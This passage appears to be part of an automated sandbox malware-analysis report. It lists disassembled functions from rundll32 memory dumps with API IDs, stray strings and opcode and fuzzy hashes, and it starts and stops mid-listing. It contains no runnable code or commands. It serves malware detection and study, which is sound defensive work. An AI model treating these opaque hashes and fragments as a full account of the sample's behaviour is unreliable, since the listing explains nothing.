                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateSemaphore$ExceptionThrow
                                                                    • String ID:
                                                                    • API String ID: 1512646613-0
                                                                    • Opcode ID: 75d6e66d7b1da5859a07f3a6ae3890beb879ccc610ad829886ef364c3f818096
                                                                    • Instruction ID: e93691e008cb4b4ab85ee9e9735b04ce08eb1731f5859d4e354ec81f36a16f9a
                                                                    • Opcode Fuzzy Hash: 75d6e66d7b1da5859a07f3a6ae3890beb879ccc610ad829886ef364c3f818096
                                                                    • Instruction Fuzzy Hash: 56217422A1BA4291EF54EB31A411B7932A1EF95B98F044234D97E477D5EF3CE4588318
                                                                    Function 000001CEAFC816A0 Relevance: 4.5, Strings: 3, Instructions: 795COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcedure
                                                                    • String ID: $'2O$U/$\8j
                                                                    • API String ID: 3653107232-658286377
                                                                    • Opcode ID: 4935f0f32ad2d9a935451ba930207134b4bd1056c48635d3548c9aa2ad88d671
                                                                    • Instruction ID: a1ab9c4454c8a3a21dd8539ad19a5c563486a8cbef38e9a9f0b05ba4edf2f4db
                                                                    • Opcode Fuzzy Hash: 4935f0f32ad2d9a935451ba930207134b4bd1056c48635d3548c9aa2ad88d671
                                                                    • Instruction Fuzzy Hash: CB52C774E906485FF798EF79E819BA932D6F78C340F60856AA449C33E6DE3CD8025784
                                                                    Function 000001CEAFC97220 Relevance: 4.4, Strings: 3, Instructions: 626COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $0$@
                                                                    • API String ID: 0-2347541974
                                                                    • Opcode ID: be94cb7cfc3cd8444ac11f04680e5f8e06e857b9d45ba6d7f6f85da26437d9a4
                                                                    • Instruction ID: b07f5b6c5c60aefbf49bad090836ebb84543d49a911eb74fcf79c6d7c7c5f964
                                                                    • Opcode Fuzzy Hash: be94cb7cfc3cd8444ac11f04680e5f8e06e857b9d45ba6d7f6f85da26437d9a4
                                                                    • Instruction Fuzzy Hash: 10326A30218B489FF7A4EB29D895BDEB7E1FB98344F50862DA48EC32D1DB34D4458B46
                                                                    Function 00007FF8A8D061E0 Relevance: 3.9, Strings: 3, Instructions: 176COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $gfffffff$gfffffff
                                                                    • API String ID: 0-496913188
                                                                    • Opcode ID: 58977adcd8a6b764af0f63b9f6905b7b143689c1d01b28076ca30d752ebbd219
                                                                    • Instruction ID: 200f26ed19a082eedc3ae9f2de068862efd5fc5dfa1cdc05526ee7116b956047
                                                                    • Opcode Fuzzy Hash: 58977adcd8a6b764af0f63b9f6905b7b143689c1d01b28076ca30d752ebbd219
                                                                    • Instruction Fuzzy Hash: 1771C272B0A616A6EF14DF66E4502EC2371EF487D4F405235DA2E4BB85DF2CE5298318
                                                                    Function 00007FF8A8DE5834 Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise_clrfp
                                                                    • String ID:
                                                                    • API String ID: 15204871-0
                                                                    • Opcode ID: 1e521753603c253260f75de318e5fd5f95f3e7c568a8fd49db7ce5474408351d
                                                                    • Instruction ID: 8f023eb0b4175fe036ea6f5a6be3a7488eee57db5399d5ee13e8eb0dede2c2a1
                                                                    • Opcode Fuzzy Hash: 1e521753603c253260f75de318e5fd5f95f3e7c568a8fd49db7ce5474408351d
                                                                    • Instruction Fuzzy Hash: F6B16B73A01B458BEB15CF2AC88236C37B1F744BD8F188922DAAD877A4DB39E415C714
                                                                    Function 000001CEAFC9B5E0 Relevance: 3.0, Strings: 2, Instructions: 550COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )$p
                                                                    • API String ID: 0-1764766951
                                                                    • Opcode ID: 9d570edb135ad5df64455d416d7b7bd6828061fa6f982e48206ddfeb261685ac
                                                                    • Instruction ID: 0a1489ef4c277d205d3bf5ccc8ccac321c746cf6aa19415554289b5efbc256bf
                                                                    • Opcode Fuzzy Hash: 9d570edb135ad5df64455d416d7b7bd6828061fa6f982e48206ddfeb261685ac
                                                                    • Instruction Fuzzy Hash: CF123C30258B489FF7A4DB19D895BEEB7E1FB88344F50492DA08EC32D1CB74D9458B46
                                                                    Function 00007FF8A8CF9AC0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DescriptorSecurity$DaclInitialize
                                                                    • String ID:
                                                                    • API String ID: 625223987-0
                                                                    • Opcode ID: c0a8e56eca8e4e281327c7623743745a170f8c253331fa8f05733e7852c7cf4d
                                                                    • Instruction ID: 749c091e5e7ccda284d5ee0aa572ff636521a6c119764348780ff116b10c5269
                                                                    • Opcode Fuzzy Hash: c0a8e56eca8e4e281327c7623743745a170f8c253331fa8f05733e7852c7cf4d
                                                                    • Instruction Fuzzy Hash: 6EF03075A0B242E6FB548F21F864B756670FF41BC5F484034C80906650DF7DA5A9C738
                                                                    Function 000001CEAFC8CBE0 Relevance: 1.9, Strings: 1, Instructions: 623COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcedure
                                                                    • String ID: !yOr
                                                                    • API String ID: 3653107232-2868905794
                                                                    • Opcode ID: a344c6b9773561e1a8feff107ffa0bbb357e6f0ee830072877925764f08a3291
                                                                    • Instruction ID: 09370bbe246c57d3dada80a30031289b74c2bbe8322aa002940e463231374403
                                                                    • Opcode Fuzzy Hash: a344c6b9773561e1a8feff107ffa0bbb357e6f0ee830072877925764f08a3291
                                                                    • Instruction Fuzzy Hash: B9226D30218B488FE7A8EB29C455BEEB7E1FB88344F51452DA08EC32D1DF75D8458B86
                                                                    Function 00007FF8A8D1C3A8 Relevance: 1.8, APIs: 1, Instructions: 349COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID:
                                                                    • API String ID: 1323251999-0
                                                                    • Opcode ID: 22d042ea3a28c32213cb79e8b619b4f295c814ae5b951abea629a08cfbfc3cc7
                                                                    • Instruction ID: 635a45da0097f907fa8ebcc476fb1659bb1fad70ac138dd842c3f7ad9ba09c6b
                                                                    • Opcode Fuzzy Hash: 22d042ea3a28c32213cb79e8b619b4f295c814ae5b951abea629a08cfbfc3cc7
                                                                    • Instruction Fuzzy Hash: C6E1BF22B1AA91A5FB11CB65D0402FD27A0EF54BC8F441131EE9E17B89EF7CE589C324
                                                                    Function 000001CEAFC8B4E0 Relevance: 1.8, Strings: 1, Instructions: 571COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: P
                                                                    • API String ID: 0-3110715001
                                                                    • Opcode ID: fc71c7b77c584ab428780ddc863f287b4ad5f6815cb57d0fe849b24e33f4b176
                                                                    • Instruction ID: 1c05d8dc99e1e661a38074126520c80e02b6b26d6a46eba21ed024c878884d89
                                                                    • Opcode Fuzzy Hash: fc71c7b77c584ab428780ddc863f287b4ad5f6815cb57d0fe849b24e33f4b176
                                                                    • Instruction Fuzzy Hash: 1812C630258B489FF774AF69D459BEEB6D2FB88340F51452DA08AC32D2DF78D8418786
                                                                    Function 00007FF8A8D1BEDC Relevance: 1.8, APIs: 1, Instructions: 314COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID:
                                                                    • API String ID: 1323251999-0
                                                                    • Opcode ID: 88fd66ed8c93d63684982f8caed945330649921e66e0deda39417e65845a2336
                                                                    • Instruction ID: 35f14ef954ce078a15ed1deadf0d328c11e5240e63fd03e1f29801da1ea8d3ed
                                                                    • Opcode Fuzzy Hash: 88fd66ed8c93d63684982f8caed945330649921e66e0deda39417e65845a2336
                                                                    • Instruction Fuzzy Hash: 65D19122F0A69199FB11CBB5D0012FD63B1EF55B88F444131DE9D27B89DF38E58A8368
                                                                    Function 00007FF8A8D2530C Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$DeallocateXinvalid_argument
                                                                    • String ID:
                                                                    • API String ID: 1940402478-0
                                                                    • Opcode ID: 6d49e94807b1f179427749f465642f2da799c52822a2ea57ed54f5f7d9566d11
                                                                    • Instruction ID: aa1afd552b27a1d9c8464907b29ad65be902c40fa05d197bf7cb9cb2ec32cc73
                                                                    • Opcode Fuzzy Hash: 6d49e94807b1f179427749f465642f2da799c52822a2ea57ed54f5f7d9566d11
                                                                    • Instruction Fuzzy Hash: 77C11572B1A6C952DF10CB26E8446AEA760FB98BC0F455032EE9D47B85EF3CE009C714
                                                                    Function 000001CEAFC75D60 Relevance: 1.8, Strings: 1, Instructions: 524COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (
                                                                    • API String ID: 0-3887548279
                                                                    • Opcode ID: f0e7dd1c77ade1b2000a5ea3d18a18395cd9001f657993a855ba74be45576139
                                                                    • Instruction ID: ead2d9d8eafd4a6bc0220aec958e5baeaec9dd1945a0f6f31375da923aa7ad28
                                                                    • Opcode Fuzzy Hash: f0e7dd1c77ade1b2000a5ea3d18a18395cd9001f657993a855ba74be45576139
                                                                    • Instruction Fuzzy Hash: 74F18070E58B489FF7A8DF2A8445BAEB7D2FB88344F50452DE08AC32D1DB34D845974A
                                                                    Function 000001CEAFC913A3 Relevance: 1.7, Strings: 1, Instructions: 437COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: c30bd7ab68d751d74eb6e3fcd089575567a5f3ab528e208d543831b4295961bd
                                                                    • Instruction ID: 5a33167aceb2a6abf259fa16346e3c2dc3ae38b9808ba9ec19159a2bf6deb438
                                                                    • Opcode Fuzzy Hash: c30bd7ab68d751d74eb6e3fcd089575567a5f3ab528e208d543831b4295961bd
                                                                    • Instruction Fuzzy Hash: BDE1B330668B895FF774AB29C486BEEB7D1FB98344F108A2E948AC31D2DA34D4458746
                                                                    Function 000001CEAFC94550 Relevance: 1.7, Strings: 1, Instructions: 427COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8
                                                                    • API String ID: 0-4194326291
                                                                    • Opcode ID: a3dc7b8e494b16dd21b97287bb3eaff47006ed4ed7018e253540c91b99ff9934
                                                                    • Instruction ID: d8a1b08f8483ce168d12d0e155a457dafbcc388a607c97a6455a3391a7264470
                                                                    • Opcode Fuzzy Hash: a3dc7b8e494b16dd21b97287bb3eaff47006ed4ed7018e253540c91b99ff9934
                                                                    • Instruction Fuzzy Hash: 41D17330268B485FF764EB29D856BEEB3D2FB88340F50852DA45AC32D2DF74D8458786
                                                                    Function 00007FF8A8D09D8C Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSingleWait
                                                                    • String ID:
                                                                    • API String ID: 24740636-0
                                                                    • Opcode ID: 718267e9826e8370e2889d1920cb342ac8506d4ba1e34d31712e09ab52e2dd6f
                                                                    • Instruction ID: c03f72745747746aa4ca6fed6c3797eb6542a2f8e0c1c2b6165de31e958d429d
                                                                    • Opcode Fuzzy Hash: 718267e9826e8370e2889d1920cb342ac8506d4ba1e34d31712e09ab52e2dd6f
                                                                    • Instruction Fuzzy Hash: CD41A231A1BA42A2EB289A24D4A537E6261EF447D0F440239DA7F437D5DF2CEC58C768
                                                                    Function 000001CEAFC966E0 Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 990200c829865227b6571aa3573083370787801c1570d2fe66e4a338792caab8
                                                                    • Instruction ID: e38d6c135564e5051a1db5a17ac7f48310b8c1a4206d0263a679fb2e44b4aae3
                                                                    • Opcode Fuzzy Hash: 990200c829865227b6571aa3573083370787801c1570d2fe66e4a338792caab8
                                                                    • Instruction Fuzzy Hash: 76A1D7302686485FF758AB29D455BEEB7D2FB88344F50452DF08AC32D2DF39D842978A
                                                                    Function 000001CEAFCA1490 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 59a31fbeb8a05151edb759329d96371e831f95528c315330fb92cc5f8aafcbf3
                                                                    • Instruction ID: 56e2502a16755275fdbf92e33e718c331ecd8984ea1885a1274d75f33fc10056
                                                                    • Opcode Fuzzy Hash: 59a31fbeb8a05151edb759329d96371e831f95528c315330fb92cc5f8aafcbf3
                                                                    • Instruction Fuzzy Hash: 8DB15F30628B044FE758EB2CD466B9EB7D2FBC8744F50462DB0CAD36D1CB79E9418686
                                                                    Function 00007FF8A8DCBB1C Relevance: 1.5, Strings: 1, Instructions: 209COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: 0
                                                                    • API String ID: 3215553584-4108050209
                                                                    • Opcode ID: 195b2cfd414302573d07b6318a124d7905505630c4cf68cee92227e9f8746074
                                                                    • Instruction ID: b03313c1b33f932a17dd6ec6f1f269ad223bbca1786801cd00181470a590026c
                                                                    • Opcode Fuzzy Hash: 195b2cfd414302573d07b6318a124d7905505630c4cf68cee92227e9f8746074
                                                                    • Instruction Fuzzy Hash: C87128A1A1A20362FB78AE3B41406B92691EF407C4F845431DF6E07699CF2DE84F972D
                                                                    Function 000001CEAFC766C0 Relevance: 1.0, Instructions: 996COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c77ee9db95c24773db9081a7deccb5cf2f36f3081fec3039551d8f54b381666b
                                                                    • Instruction ID: cf6950cfadc0a484f7f4069843dacffc98a3cfec29972e1e0726d5ebc2c3f580
